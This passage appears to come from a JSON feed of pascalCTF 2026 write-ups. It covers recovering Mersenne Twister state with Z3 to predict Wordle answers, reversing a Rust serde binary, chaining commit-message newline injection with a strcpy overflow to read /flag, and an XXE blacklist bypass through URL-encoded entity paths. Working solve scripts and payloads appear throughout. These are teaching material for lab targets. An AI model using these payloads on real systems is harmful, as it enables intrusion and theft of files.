When we create a Z3 variable:\nx = BitVec(\u0026#39;x\u0026#39;, 32) # \u0026#34;x is some unknown 32-bit value\u0026#34; This x isn\u0026rsquo;t a number. It\u0026rsquo;s a symbol representing \u0026ldquo;some 32-bit value we don\u0026rsquo;t know yet.\u0026rdquo; Now when we write:\ny = x ^ 3 Python doesn\u0026rsquo;t (can\u0026rsquo;t!) compute this, because x has no concrete value. Instead, Z3 overloads the ^ operator so that it builds an expression tree rather than computing a result. This is why the code looks like normal math, but Z3 has hijacked every operator to record what\u0026rsquo;s happening instead of actually doing it:\nXOR / \\ x 3 The variable y now holds this tree structure, not a number. If we keep going:\nz = y ^ 7 We get a bigger tree:\nXOR / \\ XOR 7 / \\ x 3 This is what \u0026ldquo;symbolic computation\u0026rdquo; means: instead of calculating results, we\u0026rsquo;re building up descriptions of how to calculate results, in terms of unknown variables.\nHow constraints work # Now comes the key part. When we write:\ns = Solver() s.add(z == 10) We\u0026rsquo;re telling Z3: \u0026ldquo;the expression (x ^ 3) ^ 7 must equal 10.\u0026rdquo; Z3 records this constraint. Later, when we call s.check(), Z3 works backwards: \u0026ldquo;what value of x makes this true?\u0026rdquo;\nFor this simple example: (x ^ 3) ^ 7 = 10 means x ^ 3 = 10 ^ 7 = 13, so x = 13 ^ 3 = 14.\nScaling up to MT19937 # The same principle applies to our attack. 
We create 624 symbolic variables:\nstate = [BitVec(f\u0026#39;mt_{i}\u0026#39;, 32) for i in range(N)] Each state[i] represents \u0026ldquo;the unknown \\(i\\)-th word of the MT19937 state.\u0026rdquo;\nThen we symbolically compute tempering:\ntempered = state[i] tempered = tempered ^ LShR(tempered, 11) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) tempered = tempered ^ LShR(tempered, 18) After this, tempered isn\u0026rsquo;t a number. It\u0026rsquo;s an enormous expression tree with state[i] at the leaves, describing exactly how tempering transforms that state word. (Note: LShR is Z3\u0026rsquo;s logical right shift, which fills with zeros like C does for unsigned integers. Z3\u0026rsquo;s \u0026gt;\u0026gt; operator always does arithmetic shift (copies the top bit), so 0x80000000 \u0026gt;\u0026gt; 1 would give 0xC0000000 instead of 0x40000000.)\nNow we add a constraint:\ns.add(Extract(19, 0, tempered) == observations[i]) Extract(19, 0, tempered) builds another expression: \u0026ldquo;bits 0-19 of the tempered result.\u0026rdquo; Setting it equal to our observation tells Z3: \u0026ldquo;whatever state[i] is, when you temper it and take the low 20 bits, you must get this specific value.\u0026rdquo;\nEach observation adds 20 such bit-level constraints. After 1000+ observations, Z3 has enough constraints to uniquely determine all 624 state words.\nHandling the twist # For observations 624+, the output comes from twisted state. 
We compute this symbolically too:\nMATRIX_A = BitVecVal(0x9908B0DF, 32) # Concrete constant, not symbolic twisted = [] for i in range(N): y = (state[i] \u0026amp; 0x80000000) | (state[(i + 1) % N] \u0026amp; 0x7FFFFFFF) twisted.append(state[(i + 397) % N] ^ LShR(y, 1) ^ If((y \u0026amp; 1) == 1, MATRIX_A, BitVecVal(0, 32))) Now twisted[i] is an expression tree involving multiple original state words: state[i], state[i+1], and state[(i+397) % 624]. The If(cond, then, else) creates a conditional expression that Z3 will resolve once it knows the bit values.\nConstraints on twisted outputs therefore link multiple state words together, creating the cross-word dependencies that make the system fully determined.\nSolving # Finally:\ns.check() # Returns sat, unsat, or unknown return [s.model()[state[i]].as_long() for i in range(N)] s.check() runs the solver; internally, Z3 converts all our expression trees into a system of boolean equations (one per bit). If satisfiable, s.model() returns a mapping from symbolic variables to concrete values, and we extract each state word with .as_long().\nThe solver typically finishes in under a minute because the constraint system is linear over bits (XOR-based). 
Z3 essentially performs Gaussian elimination on ~25000 boolean equations.\nPutting it together # Collection phase # We play 1260 rounds of Wordle, recovering each secret and extracting its 20-bit index:\nobservations = [] for i in range(1260): io.sendline(b\u0026#39;NEW\u0026#39;) io.recvuntil(b\u0026#39;ROUND STARTED\u0026#39;) secret = solve_wordle(io) observations.append(word_to_index(secret)) The choice of 1260 ensures we span two twist boundaries (twists occur at outputs 624 and 1248), maximizing constraint diversity.\nRecovery and prediction phase # With all observations collected, we recover the state and create a concrete RNG instance:\nstate = recover_state(observations) rng = MT19937(state, 0) We fast-forward past all the outputs we\u0026rsquo;ve already seen:\nfor _ in range(len(observations)): rng.next_u32() Now the RNG is positioned exactly where the server\u0026rsquo;s RNG is. The next 5 outputs will match:\nfor _ in range(5): pred = rng.next_u32() \u0026amp; 0xFFFFF io.sendline(f\u0026#39;FINAL {index_to_word(pred)}\u0026#39;.encode()) Final solve script # from pwn import * from z3 import * import itertools ALPHABET = \u0026#34;abcdefghijklmnop\u0026#34; N = 624 def index_to_word(idx): word = \u0026#34;\u0026#34; for _ in range(5): word = ALPHABET[idx % 16] + word idx //= 16 return word def word_to_index(word): x = 0 for c in word: x = x * 16 + ALPHABET.index(c) return x def solve_wordle(io): known_pos = [None] * 5 counts = {} for c in ALPHABET: io.sendline(f\u0026#39;GUESS {c * 5}\u0026#39;.encode()) io.recvuntil(b\u0026#39;FEEDBACK \u0026#39;) fb = io.recvline().decode().strip() if fb == \u0026#39;_____\u0026#39;: continue g_count = fb.count(\u0026#39;G\u0026#39;) y_count = fb.count(\u0026#39;Y\u0026#39;) total = g_count + y_count if total \u0026gt; 0: counts[c] = total for i, f in enumerate(fb): if f == \u0026#39;G\u0026#39;: known_pos[i] = c if all(p is not None for p in known_pos): return \u0026#39;\u0026#39;.join(known_pos) unknown = [i for i 
in range(5) if known_pos[i] is None] remaining = dict(counts) for p in known_pos: if p is not None and p in remaining: remaining[p] -= 1 if remaining[p] == 0: del remaining[p] letters = [] for c, n in remaining.items(): letters += [c] * n for perm in itertools.permutations(letters, len(unknown)): candidate = list(known_pos) for i, pos in enumerate(unknown): candidate[pos] = perm[i] word = \u0026#39;\u0026#39;.join(candidate) io.sendline(f\u0026#39;GUESS {word}\u0026#39;.encode()) io.recvuntil(b\u0026#39;FEEDBACK \u0026#39;) if io.recvline().decode().strip() == \u0026#39;GGGGG\u0026#39;: return word class MT19937: def __init__(self, state, index=0): self.mt = state[:] self.index = index def twist(self): old = self.mt[:] for i in range(N): y = (old[i] \u0026amp; 0x80000000) | (old[(i + 1) % N] \u0026amp; 0x7FFFFFFF) self.mt[i] = (old[(i + 397) % N] ^ (y \u0026gt;\u0026gt; 1) ^ (0x9908B0DF if y \u0026amp; 1 else 0)) \u0026amp; 0xFFFFFFFF self.index = 0 def next_u32(self): if self.index \u0026gt;= N: self.twist() y = self.mt[self.index] self.index += 1 y ^= (y \u0026gt;\u0026gt; 11) y ^= ((y \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) y ^= ((y \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) y ^= (y \u0026gt;\u0026gt; 18) return y \u0026amp; 0xFFFFFFFF def recover_state(observations): s = Solver() state = [BitVec(f\u0026#39;mt_{i}\u0026#39;, 32) for i in range(N)] # Epoch 0: outputs 0-623 for i in range(min(N, len(observations))): tempered = state[i] tempered = tempered ^ LShR(tempered, 11) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) tempered = tempered ^ LShR(tempered, 18) s.add(Extract(19, 0, tempered) == observations[i]) if len(observations) \u0026gt; N: # Compute twisted state symbolically MATRIX_A = BitVecVal(0x9908B0DF, 32) twisted = [] for i in range(N): y = (state[i] \u0026amp; 0x80000000) | (state[(i + 1) % N] \u0026amp; 0x7FFFFFFF) 
twisted.append(state[(i + 397) % N] ^ LShR(y, 1) ^ If((y \u0026amp; 1) == 1, MATRIX_A, BitVecVal(0, 32))) # Epoch 1: outputs 624-1247 for i in range(N, min(2 * N, len(observations))): idx = i - N tempered = twisted[idx] tempered = tempered ^ LShR(tempered, 11) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) tempered = tempered ^ LShR(tempered, 18) s.add(Extract(19, 0, tempered) == observations[i]) if len(observations) \u0026gt; 2 * N: # Second twist twisted2 = [] for i in range(N): y = (twisted[i] \u0026amp; 0x80000000) | (twisted[(i + 1) % N] \u0026amp; 0x7FFFFFFF) twisted2.append(twisted[(i + 397) % N] ^ LShR(y, 1) ^ If((y \u0026amp; 1) == 1, MATRIX_A, BitVecVal(0, 32))) # Epoch 2: outputs 1248+ for i in range(2 * N, len(observations)): idx = i - 2 * N tempered = twisted2[idx] tempered = tempered ^ LShR(tempered, 11) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) tempered = tempered ^ LShR(tempered, 18) s.add(Extract(19, 0, tempered) == observations[i]) s.check() return [s.model()[state[i]].as_long() for i in range(N)] io = remote(\u0026#34;wordy.ctf.pascalctf.it\u0026#34;, 5005) # io = process([\u0026#39;python3\u0026#39;, \u0026#39;service.py\u0026#39;], env={\u0026#34;FLAG\u0026#34;: \u0026#34;test{flag}\u0026#34;}) io.recvuntil(b\u0026#34;READY\u0026#34;) observations = [] for i in range(1260): io.sendline(b\u0026#34;NEW\u0026#34;) io.recvuntil(b\u0026#34;ROUND STARTED\u0026#34;) secret = solve_wordle(io) observations.append(word_to_index(secret)) state = recover_state(observations) rng = MT19937(state, 0) for _ in range(len(observations)): rng.next_u32() for _ in range(5): pred = rng.next_u32() \u0026amp; 0xFFFFF io.sendline(f\u0026#34;FINAL {index_to_word(pred)}\u0026#34;.encode()) print(io.recvline().decode()) io.interactive() Flag # 
pascalCTF{Y0ur_l1k3_a_3ncycl0p3d14_0f_r4nd0m_w0rds!} ","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/wordy/","section":"CTFs","summary":"Recovering MT19937 state from partial outputs using Z3 SAT solving.","title":"Wordy","type":"ctfs"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/tags/z3/","section":"Tags","summary":"","title":"Z3","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/blacklist-bypass/","section":"Tags","summary":"","title":"Blacklist-Bypass","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/buffer-overflow/","section":"Tags","summary":"","title":"Buffer-Overflow","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/bytecode/","section":"Tags","summary":"","title":"Bytecode","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/command-injection/","section":"Tags","summary":"","title":"Command-Injection","type":"tags"},{"content":"A crab stole my json schema\u0026hellip;\nThe challenge is a Rust binary that reads JSON from stdin and outputs either a crab emoji (success) or a sad face (failure):\n$ echo \u0026#39;{\u0026#34;test\u0026#34;: 1}\u0026#39; | ./curly-crab Give me a JSONy flag! 😔 $ echo \u0026#39;???\u0026#39; | ./curly-crab Give me a JSONy flag! 🦀 We need to figure out what JSON structure makes the crab happy.\nWhy Rust reversing is painful # Coming from C reversing, Rust binaries have some extra headaches:\nMonomorphization: Generic functions get duplicated for each concrete type. A simple Vec\u0026lt;T\u0026gt; becomes separate code for Vec\u0026lt;i32\u0026gt;, Vec\u0026lt;String\u0026gt;, etc. The binary bloats with near-identical functions.\nAggressive inlining: Small functions get inlined everywhere. 
What would be a clean call instruction in C becomes a wall of duplicated code.\nStandard library bloat: Even simple operations pull in tons of library code for error handling, Result unwrapping, iterator machinery, etc. A \u0026ldquo;hello world\u0026rdquo; in Rust is 300KB+.\nName mangling on steroids: Function names become monstrosities like _ZN4core3ptr85drop_in_place$LT$alloc..vec..Vec$LT$u8$GT$$GT$17h3b2c...\nOwnership/borrowing artifacts: The decompiled code is littered with drop_in_place calls, reference counting, and move semantics that obscure the actual logic.\nThe saving grace here: Rust\u0026rsquo;s serde library generates predictable patterns for JSON deserialization.\nThe reality: what you\u0026rsquo;re actually looking at # Before showing the cleaned-up version, here\u0026rsquo;s what Rust binaries actually look like in a decompiler. This is the real main function:\nint64_t curly_crab::main::h71b58f7aacf87a44() { std::io::stdio::_print::h526c462071e58c18(\u0026amp;data_7a8b[0x91], 0x2d); std::io::stdio::stdin::h11deceff11981680(); void* var_30 = \u0026amp;std::io::stdio::stdin::INSTANCE::h067a27bca4e07de8; int32_t* rax; rax = std::io::stdio::Stdin::lock::h1079d43173269675(\u0026amp;var_30); // ... 50 more lines of Result unwrapping and panic handling ... serde_json::de::from_trait::h1f3bcad3bd3177ac(\u0026amp;var_80, \u0026amp;var_d8); if (var_80 != -0x8000000000000000) { std::io::stdio::_print::h526c462071e58c18(\u0026amp;data_7b32, 0xb); // 🦀 } else { std::io::stdio::_eprint::hbab4723ed852db00(\u0026amp;data_7b37, 0xb); // 😔 } // ... 30 more lines of cleanup ... } The useful bits are buried in noise. Here\u0026rsquo;s how to navigate it.\nPractical tips for reversing Rust/serde # 1. 
Use function names as landmarks # Even mangled, the names tell you what\u0026rsquo;s happening:\nserde_json::de::from_trait → JSON parsing entry point deserialize_struct → struct field parsing deserialize_bool, deserialize_string → primitive types drop_in_place, __rust_dealloc → cleanup (ignore these) 2. Field matching follows a pattern # Serde checks field length first, then compares bytes as integers:\nif (rax_3 == 6) // length == 6 { if (!((*(r15_1 + 4) ^ 0x7962) | (*r15_1 ^ 0x62617263))) // matched! } The XOR-and-OR pattern (a ^ expected1) | (b ^ expected2) equals zero only if both match.\n3. Search for concatenated field names # Serde embeds field names in error messages. Search for strings like:\n\u0026#34;I_crabbycr4bsstruct Crab with 3 elements\u0026#34; This tells you the struct has fields I_, crabby, cr4bs and is called Crab.\n4. Ignore the noise # Most of the code is:\nResult/Option checking (-0x8000000000000000 is the Err/None discriminant) Memory cleanup (__rust_dealloc, drop_in_place) Whitespace skipping (the TEST_BITQ(0x100002600, ...) pattern) Panic handling Focus on the actual comparisons and function calls.\nIdentifying serde in the binary # Signs to look for:\nString references: Search for \u0026quot;expected struct\u0026quot;, \u0026quot;missing field\u0026quot;, \u0026quot;invalid type\u0026quot;.\nFunction name fragments: Look for serde, deserialize, Visitor, SeqAccess.\nConcatenated field names: Serde error messages contain field lists like \u0026quot;I_crabbycr4bs\u0026quot;.\nSearching strings for \u0026ldquo;struct\u0026rdquo; reveals the struct names:\n\u0026#34;expected struct TopLevel\u0026#34; \u0026#34;expected struct Crab\u0026#34; \u0026#34;expected struct Crabby\u0026#34; This tells us the hierarchy. Now we need the field names.\nHow serde deserialization works # Serde is Rust\u0026rsquo;s serialization framework. 
When you write:\n#[derive(Deserialize)] struct Crab { I_: bool, crabby: Crabby, cr4bs: i32, } The #[derive(Deserialize)] macro generates a deserialize function that:\nExpects either { (object) or [ (tuple/array format) Reads field names as strings Matches them against expected field names Recursively deserializes nested types Returns an error if anything doesn\u0026rsquo;t match The key insight: field name matching uses integer comparisons on the raw bytes. Instead of string comparison, serde compares chunks of the field name as integers for speed.\nFinding the entry point # Starting from main, trace the calls:\ncurly_crab::main::h71b58f7aacf87a44 │ └── serde_json::de::from_trait::h1f3bcad3bd3177ac │ └── deserialize_struct::he3c85fe01abee1f1 ← top-level struct The from_trait function is just a wrapper. The real work happens in deserialize_struct.\nWhat you\u0026rsquo;re actually looking for # Here\u0026rsquo;s a snippet from the real deserialize_struct for the top-level struct. I\u0026rsquo;ve annotated the important parts:\n// Inside deserialize_struct - the actual decompiled mess // ... skip past the \u0026#39;{\u0026#39; check and 100 lines of setup ... // THIS IS THE GOLD - field length switch if (var_148 == 3) // ← field length check { // Compare bytes: (byte[2] ^ \u0026#39;F\u0026#39;) | (bytes[0:2] ^ 0x5443) if ((*(r13_1 + 2) ^ 0x46) | (*r13_1 ^ 0x5443)) goto label_2c1ab; // unknown field // Matched \u0026#34;CTF\u0026#34;! Now deserialize the value... } else if (var_148 == 4) { if (*r13_1 != 0x62617263) // ← compare as 4-byte int goto label_2c1ab; // Matched \u0026#34;crab\u0026#34;! Call nested struct deserializer _$LT$RF$mut$u20$serde_j...deserialize_struct::hb5c049ded4c5ad6a(\u0026amp;var_158, r15_1); } else if (var_148 == 6) { // Two comparisons: 4 bytes + 2 bytes if ((*(r13_1 + 4) ^ 0x6c61) | (*r13_1 ^ 0x63736170)) goto label_2c1ab; // Matched \u0026#34;pascal\u0026#34;! 
Deserialize string _$LT$RF$mut$u20$serde_j...deserialize_string::h4c289388cf84ac5d(\u0026amp;var_d8, r15_1); } The pattern to look for:\nLength check in an if/switch Byte comparisons using XOR: (a ^ expected) | (b ^ expected) (equals 0 if match) Call to another deserialize_* function for the value Mapping the struct hierarchy # Follow the deserialize_struct calls to find nested structs. Each one has the same pattern of length checks and hex comparisons.\nTop-level struct # From the code above:\nCTF (len=3, 0x5443 + 0x46) → integer crab (len=4, 0x62617263) → nested struct via deserialize_struct::hb5c049ded4c5ad6a pascal (len=6, 0x63736170 + 0x6c61) → string Nested \u0026ldquo;crab\u0026rdquo; struct # Following deserialize_struct::hb5c049ded4c5ad6a, same pattern:\nif (rax_3 == 2) // \u0026#34;I_\u0026#34; if (*r15_1 != 0x5f49) goto unknown; // deserialize_bool else if (rax_3 == 5) // \u0026#34;cr4bs\u0026#34; if ((*(r15_1 + 4) ^ 0x73) | (*r15_1 ^ 0x62347263)) goto unknown; // deserialize integer else if (rax_3 == 6) // \u0026#34;crabby\u0026#34; if ((*(r15_1 + 4) ^ 0x7962) | (*r15_1 ^ 0x62617263)) goto unknown; // deserialize_struct::h39718c3ed97ba090 (another nested struct!) 
Fields: I_ (bool), cr4bs (int), crabby (struct)\nInner \u0026ldquo;crabby\u0026rdquo; struct # Following the next deserialize_struct:\nl0v3_ (len=5, 0x3376306c + 0x5f) → array r3vv1ng_ (len=8, 0x5f676e3176763372) → integer Visual hierarchy # Top-level ├── CTF: integer ├── crab: struct │ ├── I_: boolean │ ├── crabby: struct │ │ ├── r3vv1ng_: integer │ │ └── l0v3_: array │ └── cr4bs: integer └── pascal: string Constructing valid JSON # Based on the schema: { \u0026#34;CTF\u0026#34;: 1, \u0026#34;crab\u0026#34;: { \u0026#34;I_\u0026#34;: true, \u0026#34;crabby\u0026#34;: { \u0026#34;r3vv1ng_\u0026#34;: 1, \u0026#34;l0v3_\u0026#34;: [] }, \u0026#34;cr4bs\u0026#34;: 1 }, \u0026#34;pascal\u0026#34;: \u0026#34;test\u0026#34; } Testing:\n$ echo \u0026#39;{\u0026#34;CTF\u0026#34;:1,\u0026#34;crab\u0026#34;:{\u0026#34;I_\u0026#34;:true,\u0026#34;crabby\u0026#34;:{\u0026#34;r3vv1ng_\u0026#34;:1,\u0026#34;l0v3_\u0026#34;:[]},\u0026#34;cr4bs\u0026#34;:1},\u0026#34;pascal\u0026#34;:\u0026#34;x\u0026#34;}\u0026#39; | ./curly-crab Give me a JSONy flag! 🦀 Extracting the flag # Some people submitted massive JSON documents that happened to work because they included the required fields somewhere. 
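As a sanity check, the hex constants quoted from the decompilation can be re-derived from the field names themselves. This is my own verification sketch (not part of the original solve); serde_chunks is a hypothetical helper mimicking how the compiled matcher splits a name into little-endian words:

```python
import struct

def serde_chunks(name: bytes) -> list:
    # Split a field name the way the XOR comparisons do:
    # little-endian 4-byte words first, then a 2- or 1-byte tail.
    out, i = [], 0
    while len(name) - i >= 4:
        out.append(struct.unpack_from('<I', name, i)[0])
        i += 4
    if len(name) - i == 2:
        out.append(struct.unpack_from('<H', name, i)[0])
    elif len(name) - i == 1:
        out.append(name[i])
    return out

# Constants observed in the decompiled field matchers:
assert serde_chunks(b'crab')   == [0x62617263]
assert serde_chunks(b'pascal') == [0x63736170, 0x6C61]
assert serde_chunks(b'crabby') == [0x62617263, 0x7962]
assert serde_chunks(b'cr4bs')  == [0x62347263, 0x73]
assert serde_chunks(b'I_')     == [0x5F49]
```

Running this confirms that every comparison constant is just the raw field-name bytes reinterpreted as integers, which is why searching for ASCII-looking hex values is such a quick way to recover a serde schema.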
The key is understanding what\u0026rsquo;s actually being validated: just the field names and types, nothing more.\nThe field names spell out the flag: I_, l0v3_, r3vv1ng_, cr4bs.\nFlag # pascalCTF{I_l0v3_r3vv1ng_cr4bs} ","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/curly-crab/","section":"CTFs","summary":"Reversing Rust serde deserialization to recover a JSON schema.","title":"Curly Crab","type":"ctfs"},{"content":"Many friends of mine hate git, so I made a git-like tool for them.\nThe flag can be found at /flag.\nssh \u0026lt;user\u0026gt;@git.ctf.pascalctf.it -p2222 The challenge provides a simplified git implementation called mygit:\n$ mygit Usage: mygit \u0026lt;command\u0026gt; [args] Commands: init Initialize repository add \u0026lt;file\u0026gt; Stage file commit -m \u0026lt;msg\u0026gt; Create commit branch [name] List/create branches checkout \u0026lt;branch\u0026gt; Switch branch status Show status log Show history The binary runs as a privileged user and can read /flag. We need to find a way to leak its contents.\nVulnerability 1: Newline injection in commit messages # The commit command writes the message directly into the commit file using sprintf:\nsprintf(buffer, \u0026#34;message %s\\n\u0026#34;, msg); No sanitization. If we include newlines in the message, we can inject arbitrary fields into the commit file format. The commit file structure looks like:\ntree \u0026lt;hash\u0026gt; parent \u0026lt;hash\u0026gt; message \u0026lt;msg\u0026gt; files \u0026lt;count\u0026gt; \u0026lt;hash\u0026gt; \u0026lt;path\u0026gt; \u0026lt;hash\u0026gt; \u0026lt;path\u0026gt; ... 
By injecting \\nfiles 1\\n\u0026lt;hash\u0026gt; \u0026lt;path\u0026gt;, we can add fake file entries that will be processed during checkout.\nVulnerability 2: Buffer overflow in path validation # The validate_path function checks for path traversal:\nstruct { int valid; char buffer[32]; } ctx; int validate_path(char *path) { ctx.valid = 1; if (strstr(path, \u0026#34;..\u0026#34;) != NULL) { ctx.valid = 0; } strcpy(ctx.buffer, path); // No bounds check! return ctx.valid; } The problem: strcpy has no length limit. If path is longer than 32 bytes, it overflows buffer and corrupts valid.\nMemory layout:\n┌─────────────────────────────────────────────────┬───────────┐ │ ctx.buffer (32 bytes) │ ctx.valid │ └─────────────────────────────────────────────────┴───────────┘ ↑ overflow overwrites this If we provide a path like ../../../../../../../../../../../../flag (40+ chars), the overflow writes past buffer into valid. Even though strstr sets valid = 0 (because of \u0026ldquo;..\u0026rdquo;), the subsequent strcpy overflow corrupts it back to a non-zero value, making the function return \u0026ldquo;valid\u0026rdquo;.\nPutting it together # During checkout, for each file in the commit:\nvalidate_path(file-\u0026gt;hash); // Check hash path validate_path(file-\u0026gt;path); // Check destination path content = object_read(file-\u0026gt;hash); // Read from .mygit/objects/\u0026lt;hash\u0026gt; file_write(file-\u0026gt;path, content); // Write to destination The object_read constructs the path:\nsnprintf(obj_path, 0x400, \u0026#34;.mygit/objects/%s\u0026#34;, hash); Attack plan:\nInject a fake file entry via commit message Use a hash like ../../../../../../../../../../../../flag The long path overflows validate_path, corrupting valid to bypass the \u0026ldquo;..\u0026rdquo; check object_read reads .mygit/objects/../../../../../../../../../../../../flag = /flag Content gets written to our controlled output file Exploit # # Initialize repo mygit init # Create and commit a dummy 
file (needed for valid repo state) echo x \u0026gt; x mygit add x mygit commit -m \u0026#34;first\u0026#34; # Create a branch to switch between mygit branch b # Create output file we can write to touch out chmod 777 out # Inject malicious commit with path traversal payload # The long path overflows validate_path\u0026#39;s buffer, corrupting the valid flag mygit commit -m $\u0026#39;p\\nfiles 1\\n../../../../../../../../../../../../flag out\u0026#39; # Trigger the checkout to read /flag and write to out mygit checkout b mygit checkout main # Read the flag cat out The commit message $'p\\nfiles 1\\n../../../../../../../../../../../../flag out' becomes:\nmessage p files 1 ../../../../../../../../../../../../flag out When we checkout main, it processes this fake file entry, reads /flag, and writes it to out.\nFlag # pascalCTF{m4ny_fr13nds_0f_m1n3_h4t3_git_btw} ","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/grande-inutile-tool/","section":"CTFs","summary":"Buffer overflow corrupts path validation flag, enabling path traversal.","title":"Grande Inutile Tool","type":"ctfs"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/json/","section":"Tags","summary":"","title":"Json","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/nan/","section":"Tags","summary":"","title":"NaN","type":"tags"},{"content":"I\u0026rsquo;ve recently developed a XML to PDF utility, I\u0026rsquo;ll probably add payments to it soon!\nThe challenge is a Flask web app that converts XML files into PDFs. The .pasx extension is just a made-up format for this challenge (probably \u0026ldquo;Pascal XML\u0026rdquo; or similar), but it\u0026rsquo;s plain XML underneath.\nWhat is XXE? # XXE (XML External Entity) injection is a vulnerability in XML parsers. 
To understand it, we need to know about XML entities.\nEntities in XML # XML has a feature called \u0026ldquo;entities\u0026rdquo;, which are like variables. You define them in a DOCTYPE declaration and reference them with \u0026amp;name;:\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE note [ \u0026lt;!ENTITY greeting \u0026#34;Hello, World!\u0026#34;\u0026gt; ]\u0026gt; \u0026lt;note\u0026gt; \u0026lt;message\u0026gt;\u0026amp;greeting;\u0026lt;/message\u0026gt; \u0026lt;/note\u0026gt; When parsed, \u0026amp;greeting; gets replaced with \u0026ldquo;Hello, World!\u0026rdquo;. This is useful for reusing text or defining special characters.\nExternal entities # The dangerous part is external entities. Instead of defining inline content, you can tell the parser to fetch content from a URI:\n\u0026lt;!ENTITY xxe SYSTEM \u0026#34;file:///etc/passwd\u0026#34;\u0026gt; The SYSTEM keyword means \u0026ldquo;fetch this from an external source\u0026rdquo;. The parser will read /etc/passwd and substitute its contents wherever \u0026amp;xxe; appears. This is XXE.\nWhy does this feature exist? # External entities were designed for legitimate use cases like:\nSplitting large documents across multiple files Including shared content (like a common header) in multiple documents Referencing DTD (Document Type Definition) files for validation The feature predates modern security concerns. Most XML parsers have it enabled by default for backwards compatibility, which is why XXE is such a common vulnerability.\nWhat can you do with XXE? 
# Read local files: SYSTEM \u0026quot;file:///etc/passwd\u0026quot; SSRF (Server-Side Request Forgery): SYSTEM \u0026quot;http://internal-server/\u0026quot; Denial of service: The \u0026ldquo;billion laughs\u0026rdquo; attack uses nested entities to consume memory Port scanning: Timing differences reveal open ports In some cases, remote code execution: Via expect:// or other protocol handlers The vulnerability # The XML parser is configured with external entity resolution enabled:\nparser = etree.XMLParser(encoding=\u0026#39;utf-8\u0026#39;, no_network=False, resolve_entities=True, recover=True) root = etree.fromstring(xml_content, parser=parser) The resolve_entities=True flag tells lxml to actually fetch and substitute external entities. Combined with no_network=False (allowing network requests), this parser is fully vulnerable to XXE.\nIn a secure configuration, you\u0026rsquo;d use resolve_entities=False or at minimum no_network=True. Many modern XML libraries disable external entities by default, but lxml wraps libxml2 which has them enabled by default for compatibility with legacy XML documents.\nWith this configuration, we can define external entities that read files from the filesystem:\n\u0026lt;!DOCTYPE book [ \u0026lt;!ENTITY xxe SYSTEM \u0026#34;/etc/passwd\u0026#34;\u0026gt; ]\u0026gt; When the parser encounters \u0026amp;xxe;, it will fetch the contents of /etc/passwd and substitute them inline.\nThe blacklist # Before parsing, the app runs a sanitization check:\ndef sanitize(xml_content): content_str = xml_content.decode(\u0026#39;utf-8\u0026#39;) if \u0026#34;\u0026amp;#\u0026#34; in content_str: return False blacklist = [ \u0026#34;flag\u0026#34;, \u0026#34;etc\u0026#34;, \u0026#34;sh\u0026#34;, \u0026#34;bash\u0026#34;, \u0026#34;proc\u0026#34;, \u0026#34;pascal\u0026#34;, \u0026#34;tmp\u0026#34;, \u0026#34;env\u0026#34;, \u0026#34;bash\u0026#34;, \u0026#34;exec\u0026#34;, \u0026#34;file\u0026#34;, \u0026#34;pascalctf is not fun\u0026#34;, ] if 
any(a in content_str.lower() for a in blacklist): return False return True This blocks obvious paths like /app/flag.txt or /etc/passwd by checking if the raw XML string contains blacklisted words. It also blocks \u0026amp;# to prevent XML character entity encoding like \u0026amp;#102; for f.\nThe bypass # The blacklist operates on the raw XML string, but the XML parser processes the content differently. Specifically, libxml2 (used by lxml) decodes URL-encoded characters in SYSTEM entity paths.\nSo we can URL-encode the blocked word:\nOriginal URL-encoded flag %66%6C%61%67 The Python blacklist sees %66%6C%61%67 and doesn\u0026rsquo;t match \u0026ldquo;flag\u0026rdquo;. But when libxml2 resolves the entity path /app/%66%6C%61%67.txt, it decodes the percent-encoding and reads /app/flag.txt.\nExploit # \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE book [ \u0026lt;!ENTITY xxe SYSTEM \u0026#34;/app/%66%6C%61%67.txt\u0026#34;\u0026gt; ]\u0026gt; \u0026lt;book\u0026gt; \u0026lt;title\u0026gt;\u0026amp;xxe;\u0026lt;/title\u0026gt; \u0026lt;author\u0026gt;x\u0026lt;/author\u0026gt; \u0026lt;year\u0026gt;2024\u0026lt;/year\u0026gt; \u0026lt;isbn\u0026gt;000\u0026lt;/isbn\u0026gt; \u0026lt;chapters\u0026gt; \u0026lt;chapter number=\u0026#34;1\u0026#34;\u0026gt; \u0026lt;title\u0026gt;x\u0026lt;/title\u0026gt; \u0026lt;content\u0026gt;x\u0026lt;/content\u0026gt; \u0026lt;/chapter\u0026gt; \u0026lt;/chapters\u0026gt; \u0026lt;/book\u0026gt; Upload this as a .pasx file, and the generated PDF will contain the flag as the book title.\nFlag # pascalCTF{xml_t0_pdf_1s_th3_n3xt_b1g_th1ng} ","date":"31 January 